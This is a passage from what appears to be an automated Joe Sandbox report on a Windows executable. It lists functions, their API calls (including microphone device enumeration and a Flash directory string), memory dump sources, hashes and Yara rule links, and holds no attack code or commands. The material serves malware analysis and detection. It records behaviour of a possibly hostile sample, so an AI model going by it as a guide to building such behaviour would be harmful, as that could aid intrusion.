                                                                                                                                                                                                                                                                                                        • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004CADC8
                                                                                                                                                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 004CADD8
                                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 004CADFF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Create$CompatibleDeleteObjectSection
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3137390749-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                                                                                                                        • Instruction ID: ec125f8efd539a004f5243cd975522e641b23088832de904e1665531ca55df12
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2981AFB56043458FC324CF29D484A67FBF1BF98314F148A6ED58A87712D334E989CBA6
                                                                                                                                                                                                                                                                                                        Function 0079E5EA Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e93d7e5d452ce734d2e2462fa7bb03522d0fd6ff82d28459489596ce1c95da32
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9eb4f438231cdf1f5a0390a81fae76cf41a7faa79662d3ed8606b3b5fb6622e9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e93d7e5d452ce734d2e2462fa7bb03522d0fd6ff82d28459489596ce1c95da32
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14510F72605206EFDF29CF54F985BAAB7A4EF58310F24452DE802872A1E73DEC51CB91
                                                                                                                                                                                                                                                                                                        Function 0052AFD0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32 ref: 0052AFF0
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0052B016
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C25F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0040C250: Sleep.KERNEL32(00000000,?,?,0052B390,?,004012F9,00000008), ref: 0040C272
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C279
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 0052B050
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0052B05B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CounterExchangeInterlockedPerformanceQuery$Compare$Sleep
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 188302963-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                                                                                                                        • Instruction ID: 331ae7ec3883c6fb41667714d1c2397b805b788a0704fbfdebc2abdcd4384ec1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19212A75604712ABC318DF65D884A9AF7E8BF89300F040A1DE85993780D734F918CBA2
                                                                                                                                                                                                                                                                                                        Function 004E5C20 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E4850: waveInGetNumDevs.WINMM(defaultmicrophone,00000000,?,00000000,?,?,?,?,004E8459,?,?,?,?,?,?,?), ref: 004E489B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E4C80: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C7E,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E4C8A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E4C80: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E4CD7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E3860: EnterCriticalSection.KERNEL32(?,00000000,?,004E5C91,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E3868
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E3860: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E388F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E5B40: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C9B,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?), ref: 004E5B4C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E5B40: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5B71
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000004,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E5CA2
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5CB2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$Devswave
                                                                                                                                                                                                                                                                                                        • String ID: echosuppression$gain
                                                                                                                                                                                                                                                                                                        • API String ID: 967401230-1829011300
                                                                                                                                                                                                                                                                                                        • Opcode ID: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                                                                                                                        • Instruction ID: eec625d20ecc8ac728587d7ca18c0fda910ff7f544bd80cb39fcd025b5d808b6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C118E35700B449BC711EB67C9A1A2BB3B9BF8871AB15049EE5464B741CB24FC02CBA4
                                                                                                                                                                                                                                                                                                        Function 00509EC0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0050B060: CreateEventA.KERNEL32(00000000,?,00000000,00000000,00000000,00509F02,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E), ref: 0050B06E
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000007C,00000001,00000001,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E,00549D98,?,?), ref: 00509F34
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000094,?,?,?,?,?,?,?,?,00153804), ref: 00509F3D
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 00509F6E
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32 ref: 00509F74
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$Event$Create
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 662013055-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                                                                                                                        • Instruction ID: a00b6d7b902e657a52a59b9571d5736a80dfe09fbfe7896e9036a1fe9281f1e6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B21C4B1540B049FE320DF6AD884A9BFBE8FF94704F00490EE1AA83661D7B1B405CB61
                                                                                                                                                                                                                                                                                                        Function 0079DE91 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0079DEAD
                                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0079DEC6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a5c6c870cbe02360b2234619489db598323c740032db365f4575ed4472c763a2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 00b83a8abc7ce385ab32bf354e41978ee56b478a752cb83b12f0cae4687b3bd0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5c6c870cbe02360b2234619489db598323c740032db365f4575ed4472c763a2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1801FC32149351AEAE3537747CCA96A27A9EB56774B200329F525491E1EF2D5C016344
                                                                                                                                                                                                                                                                                                        Function 004D2AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 004D2AB9
                                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004D2B3D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CompatibleCreateDirectorySystem
                                                                                                                                                                                                                                                                                                        • String ID: Macromed\Flash\
                                                                                                                                                                                                                                                                                                        • API String ID: 2606042488-1438515271
                                                                                                                                                                                                                                                                                                        • Opcode ID: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                                                                                                                        • Instruction ID: 299e9cb63676f09c6c690dce7675c16131e739682a5e940449f79e26451de6f9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F118A711047016FC704EF21EC52AAF77E4BF98704F40491EF19943281DB78A908CFAA
                                                                                                                                                                                                                                                                                                        Function 004F2BF0 Relevance: 5.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B22,00000001,000000FF), ref: 004F2BFE
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2C88
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2CCE
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2CF1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                                                                                                                        • Instruction ID: d821757bbb06b5f881817bb4be3b83133dcd2ebdcf47b2e92145d0cebd45ebc1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D631D2762042854FD3248F29D898A3BBBF5EFD9351F19856EE696C7381C779D808C720
                                                                                                                                                                                                                                                                                                        Function 004F64A0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004F7247,?), ref: 004F64C1
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F64E6
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F64EC
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F6515
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                                                                                                                        • Instruction ID: c39e4b2d7a975ea5970b06f88a1f0ae82272a8bb6f48ad921d14b69448efe04b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC0188352003485BC714EF24D880A77F3A9AF46258B19559DE5C657342CA39EC06CBA4
                                                                                                                                                                                                                                                                                                        Function 00401380 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0040139D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004013B3
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000005), ref: 004013CA
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000005), ref: 004013D8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1dc668918495c93d19b35d2f921703afc781594381be1afc9f76799b5a6aac2f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 280112B620070AAFC310CF69D884946FBF8FFA8314B10C55AE95983711C771F956CBA0

                                                                                                                                                                                                                                                                                                        Executed Functions

